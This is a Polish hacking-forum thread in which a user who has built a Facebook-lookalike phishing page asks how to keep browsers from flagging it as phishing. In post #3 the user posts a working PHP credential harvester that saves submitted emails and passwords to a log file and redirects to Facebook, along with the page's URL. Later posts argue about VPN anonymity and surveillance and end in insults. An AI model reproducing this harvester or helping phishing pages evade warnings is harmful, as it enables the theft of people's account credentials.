spykey

Temat: Strona phishingowa a ostrzezenia

Pokaz wyniki od 1 do 12 z 12
  1. #1 Strona phishingowa a ostrzezenia 
    Hej, zrobiłem swoją pierwszą strone phishingową, chce sprawdzić jak ona działa, a strona jest blokowana, oczywiście jeżeli ja wchodze w link z mojego kompa z mojego linku nie ma ostrzezenia zadnego ale na innym komputerze zawsze, teraz pytanie jak to zrobić aby nie wyskakiwalo takie ostrzezenie. - Strona postawiona na darmowym hostingu CBA.pl bo to tylko dla testu. Jakieś pomysły?
    Odpowiedź z Cytatem  
     

  2. #2  
    Użytkownik Avatar wiwp1994
    Dołączył
    17-03-2013
    Posty
    169
    a może jakiś screenshot? xd
    Odpowiedź z Cytatem  
     

  3. #3  
    Moge ci dac screena lub poprostu wejdz w link http://facebocklog.cba.pl/index.htm podam ci takze kod mojego prymitywnego skryptu abys nie myslal ze cos sie stanie jak wejdziesz. Jest to jak że by inaczej Strona facebooka, ktora poprostu w action=" ma zmieniony parametr na moj skrypt zamiast przekierowania.

    <?

    $email = $_POST['email'];
    $pass = $_POST ['pass'];
    $tekst = "E-mail: $email Haslo: $pass \r \n";

    $uchwyt = fopen("logi.txt","a");
    fwrite($uchwyt, $tekst);
    fclose($uchwyt);
    header('Location: https://www.facebook.com/');
    ?>
    Odpowiedź z Cytatem  
     

  4. #4  
    W sumie wiesz co, nie pomagaj mi glupio zrobilem ze dalem tu posta, lepiej bedzie jak sam dalej bede probowal rozwiac ten problem bo skoro nie wiem jak go rozwiazac znaczy ze wiem za malo i muszę sie jeszcze do uczyć, ale dzieki za chęci
    Odpowiedź z Cytatem  
     

  5. #5  
    Użytkownik Avatar wiwp1994
    Dołączył
    17-03-2013
    Posty
    169
    z tym screenshotem chodziło mi czy to na stronie pokazuje się komunikat o blokadzie czy przeglądarka go pokazuje bo cba.pl ma system antyphishingowy nie licząc tego że są tam też służby rządowe m.in. Zespół Reagowania na Incydenty Komputerowe (tu masz dowód na to https://www.cba.pl/forum/pomoc-cba-p...pl-t22885.html) więc żałuj że robiłeś taki test na tym hostingu pewnie już policja ma cie na oku bo admini cba.pl dodają tego typu strony do baz danych xd
    Odpowiedź z Cytatem  
     

  6. #6  
    Nie mieszkam w polsce i uzywam VPN
    Odpowiedź z Cytatem  
     

  7. #7  
    Użytkownik Avatar wiwp1994
    Dołączył
    17-03-2013
    Posty
    169
    Pseudo haker Thomas też nie mieszkał w Polsce i robił wszystko by zachować anonimowość i jakoś teraz siedzi za kratkami a VPN można złamać i nie mówie tu o złamaniu danych dostępowych tylko metody szyfrowania lub samego serwera VPN nie wspominając że VPN to serwer logów, mam nadzieje że chociaż twój system-gospodarz to nie zbackdoorowany kali linux albo ubuntu xd
    Ostatnio edytowane przez wiwp1994 ; 18-12-2018 o 09:36
    Odpowiedź z Cytatem  
     

  8. #8  
    Meh, co bedzie to bedzie od nikogo nic nie wyciagnalem wiec... raczej nic mi nie zrobia, wyslalem ja glownie do siebie i do kolegi o ktory widzial o wszystkim. Chyba że nawet sobie nie mozna wykrasc hasla. A jesli o tym mowa to slyszalem o facecie ktory mial problemy bo z dos'owal sam siebie na maszynie wirtualnej.
    Odpowiedź z Cytatem  
     

  9. #9  
    Użytkownik Avatar wiwp1994
    Dołączył
    17-03-2013
    Posty
    169
    Teraz pewnie nic ale to nie oto chodzi tylko o to że mogliby cie podejrzewać gdyby "coś" nie bez powodu wymyślono licencje OEM albo inne mechanizmy identyfikujące hosta chociaż w sumie nawet i bez tego by cie namierzyli bo przecież mają podłączone łącza do każdego operatora nawet jest taka ustawa/paragraf która nakazuje operatorowi podpiąć służby w celu inwigilacji, w tych czasach jak sam nie robisz sprzętu albo software-u to nigdy nie będziesz anonimowy. A no ja też słyszałem coś takiego
    Ostatnio edytowane przez wiwp1994 ; 22-12-2018 o 19:43
    Odpowiedź z Cytatem  
     

  10. #10  
    Ok,ok Zapamietam ^^, to chyba z jednej strony dobre... oczywiscie z jednej.
    Odpowiedź z Cytatem  
     

  11. #11  
    Użytkownik
    Dołączył
    04-10-2018
    Posty
    11
    Uzytkownik wiwp1994 to paranoik i zyje teoriami spiskowymi. Zespół ds. Reagowania na Incydenty Bezpieczeństwa na cba to zadne sluzby tylko zespol administracji cba zajmujacy sie wszelkimi naruszeniami. Strona phishingowa u mnie dziala poprawnie i poki nie podasz komunikatu blokady to nie wiadomo co ja blokuje. Sprzetu nie trzeba sobie samemu robic. Kolejna bajka paranoika. Szpiegowanie sprzetowe owszem istnieje ale tylko w szpiegowstwie przemyslowym tj. backodorowanie konkretnych ukladow i podzespolow na specjalne zamowienie w celu kradziezy danych w korporacjach. Taki sprzet nie jest produkowany masowo dla sprzedazy. Licencja OEM nie sluzy do szpiegowania przez sluzby a jedynie do ograniczenia instalacji programu na jednym stanowisku.
    Odpowiedź z Cytatem  
     

  12. #12  
    Użytkownik Avatar wiwp1994
    Dołączył
    17-03-2013
    Posty
    169
    Cytat Napisał Modus000 Zobacz post
    Uzytkownik wiwp1994 to paranoik i zyje teoriami spiskowymi. Zespół ds. Reagowania na Incydenty Bezpieczeństwa na cba to zadne sluzby tylko zespol administracji cba zajmujacy sie wszelkimi naruszeniami. Strona phishingowa u mnie dziala poprawnie i poki nie podasz komunikatu blokady to nie wiadomo co ja blokuje. Sprzetu nie trzeba sobie samemu robic. Kolejna bajka paranoika. Szpiegowanie sprzetowe owszem istnieje ale tylko w szpiegowstwie przemyslowym tj. backodorowanie konkretnych ukladow i podzespolow na specjalne zamowienie w celu kradziezy danych w korporacjach. Taki sprzet nie jest produkowany masowo dla sprzedazy. Licencja OEM nie sluzy do szpiegowania przez sluzby a jedynie do ograniczenia instalacji programu na jednym stanowisku.
    DD śmieszny jesteś gościu, jak nie widziałeś i nie wiesz tego co ja i jakie są możliwości w informatyce to zamknij dupe chakierze od siedmiu boleści i wiem do czego jest OEM i chodziło mi o ID licencji OEM który jest przypisywany do płyty głównej baranie... nie musisz mnie pouczać bo za wysokie progi dla cb idź dalej czytać definicje na wikipedii i sie nie wpierdalaj złamasie..
    Odpowiedź z Cytatem  
     

Podobne wątki

  1. mobilna strona phishingowa
    Przez bynek1414
    w forum Dla początkujących
    Odpowiedzi: 2
    Ostatni post / autor: 07-05-2016, 18:02
  2. Wtyczka/Strona phishingowa/ kayloger
    Przez skrzydelko12
    w forum Komunikatory
    Odpowiedzi: 4
    Ostatni post / autor: 12-04-2016, 21:13
  3. Strona www - czy moja strona ma dziure?
    Przez DNV
    w forum Dla początkujących
    Odpowiedzi: 10
    Ostatni post / autor: 25-12-2014, 03:57
  4. stronka phishingowa
    Przez gelman
    w forum HTML, CSS, JavaScript
    Odpowiedzi: 20
    Ostatni post / autor: 18-05-2008, 17:57
Uprawnienia
  • Nie mozesz zakładać nowych tematów
  • Nie mozesz pisać wiadomosci
  • Nie mozesz dodawać załączników
  • Nie mozesz edytowac swoich postów
  •